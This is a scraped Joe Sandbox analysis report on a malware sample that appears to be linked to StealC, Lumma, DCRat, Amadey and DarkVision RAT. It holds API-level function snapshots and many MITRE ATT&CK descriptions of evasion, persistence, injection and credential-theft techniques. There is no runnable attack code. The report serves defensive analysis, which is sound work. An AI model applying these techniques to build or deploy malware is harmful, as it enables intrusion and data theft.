Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 4d212bcbbd916c576362602592b122eee6030a32267101be7921d0beb1fd979a
Instruction ID: 8114494f7a0e2b2aad0541000ca25bdca38fe776e89a3f42eba788d79b85d6a9
Opcode Fuzzy Hash: 4d212bcbbd916c576362602592b122eee6030a32267101be7921d0beb1fd979a
Instruction Fuzzy Hash: BE31D6B1744380CBDB145F3CCA8429977B4BF4A308F114A6DD899A7A21EF309486CB8A

Function 6C600F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C5A2AF5,?,?,?,?,?,6C5A0A1B,00000000), ref: 6C600F1A
malloc.MOZGLUE(00000001), ref: 6C600F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C600F42
TlsGetValue.KERNEL32 ref: 6C600F5B

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 436e740223525c40e68736d77a6d6411b4855b9312598513f5f35fd8ac010e81
Instruction ID: 89935cb1c0a4af54ebd6683986c99ca14ca2dc28e72efe36c39780e55cb34215
Opcode Fuzzy Hash: 436e740223525c40e68736d77a6d6411b4855b9312598513f5f35fd8ac010e81
Instruction Fuzzy Hash: F90128B1B002809BE7102F3E9F445927BACEF82359F000575ED1CD2A21EB30C815C2EA

Function 6C5B1EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C5B1ECE
free.MOZGLUE(?), ref: 6C5B1EDF
free.MOZGLUE(?), ref: 6C5B1EEF
free.MOZGLUE(?), ref: 6C5B1EF5

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b8a6a1b38059e73c965c888b4eb471d49784269cfd09790e425c906a961825d6
Instruction ID: be69cb0a271495f84334b216be31132c85707df3c702a05afc9fcad7532439b0
Opcode Fuzzy Hash: b8a6a1b38059e73c965c888b4eb471d49784269cfd09790e425c906a961825d6
Instruction Fuzzy Hash: 32F0B4B17005016BEB10DB66EC89D277B6CEF45294B140434EC1AD3A00D736F420C6A5

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: DCRat

Threatname: Amadey

Threatname: DarkVision Rat

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Change of critical system settings

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Windows Analysis Report
file.exe

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre